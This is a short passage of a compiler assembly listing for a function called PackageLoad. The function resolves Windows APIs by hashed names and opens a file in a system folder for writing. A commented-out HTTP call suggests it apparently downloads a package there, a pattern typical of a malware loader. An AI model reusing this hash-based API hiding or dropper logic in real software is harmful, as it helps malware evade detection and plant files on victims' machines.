  00055	56		 push	 esi
  00056	e8 00 00 00 00	 call	 ??$pushargEx@$06$0NOKKJFFH@$0BMF@HHHW4SHGFP_TYPE@@PA_W@@YAPAXHHHW4SHGFP_TYPE@@PA_W@Z ; pushargEx<7,3735721303,453,int,int,int,enum SHGFP_TYPE,wchar_t *>
; 88   : 		plstrcatW( SysPath1, LoadedFileName );
  0005b	8d 45 ec	 lea	 eax, DWORD PTR _LoadedFileName$82990[ebp]
  0005e	50		 push	 eax
  0005f	8d 85 e4 fd ff
	ff		 lea	 eax, DWORD PTR _SysPath1$82989[ebp]
  00065	50		 push	 eax
  00066	e8 00 00 00 00	 call	 ??$pushargEx@$00$0CMKBLFPA@$0HP@PA_WPA_W@@YAPAXPA_W0@Z ; pushargEx<1,748795376,127,wchar_t *,wchar_t *>
; 89   : 		HANDLE hFile = (HANDLE)pCreateFileW( SysPath1, GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0 );
  0006b	6a 15		 push	 21			; 00000015H
  0006d	68 02 f1 f8 08	 push	 150532354		; 08f8f102H
  00072	6a 01		 push	 1
  00074	56		 push	 esi
  00075	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  0007a	83 c4 2c	 add	 esp, 44			; 0000002cH
  0007d	56		 push	 esi
  0007e	68 80 00 00 00	 push	 128			; 00000080H
  00083	6a 04		 push	 4
  00085	56		 push	 esi
  00086	6a 02		 push	 2
  00088	68 00 00 00 40	 push	 1073741824		; 40000000H
  0008d	8d 8d e4 fd ff
	ff		 lea	 ecx, DWORD PTR _SysPath1$82989[ebp]
  00093	51		 push	 ecx
  00094	ff d0		 call	 eax
; 90   : 		if (hFile!=INVALID_HANDLE_VALUE)
; 91   : 		{
; 92   : 		//	HTTP::ExecuteMethod(R, &Resp);
; 93   : 		}
; 94   : 	}
  00096	e9 71 ff ff ff	 jmp	 $LL3@PackageLoa
?PackageLoad@@YGKPAX@Z ENDP				; PackageLoad
_TEXT	ENDS